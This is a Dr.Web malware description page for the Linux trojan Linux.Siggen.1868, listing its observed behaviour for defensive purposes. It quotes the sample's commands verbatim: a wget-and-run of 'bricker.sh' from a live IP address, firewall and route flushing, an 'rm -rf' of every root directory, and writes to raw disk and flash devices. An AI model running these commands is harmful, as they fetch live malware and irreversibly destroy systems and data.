Linux.Siggen.1868

Added to the Dr.Web virus database: 2019-06-24

Technical Information

Malicious functions:
Modifies firewall settings:
  • iptables -t nat -F
Launches processes:
  • sh -c wget http://185.244.25.231/bricker.sh; sh bricker.sh
  • wget http://185.244.25.231/bricker.sh
  • sh bricker.sh
  • cat /proc/mounts
  • cat /dev/urandom
  • ip route del default
  • rm -rf /bin /boot /dev /etc /home /initrd.img /lib /lost+found /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var /vmlinux
Performs operations with the file system:
Creates or modifies files:
  • /root/bricker.sh
  • /dev/mtdblock1
  • /dev/mtdblock2
  • /dev/mtdblock3
  • /dev/mtdblock0
  • /dev/mtd1
  • /dev/sda
  • /dev/mmcblk0p8
  • /dev/mmcblk0p16
  • /dev/mtdblock4
  • /dev/mmcblk0p12
  • /dev/mtdblock5
  • /dev/mmcblk0
  • /dev/mmcblk0p9
  • /dev/root
  • /dev/mtd0
  • /dev/mmcblk0p13
Deletes files:
Network activity:
Establishes connection:
  • 18#.##4.25.231:245
HTTP GET requests:
  • 18#.###.25.231/bricker.sh
Sends data to the following servers:
  • 18#.##4.25.231:245

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
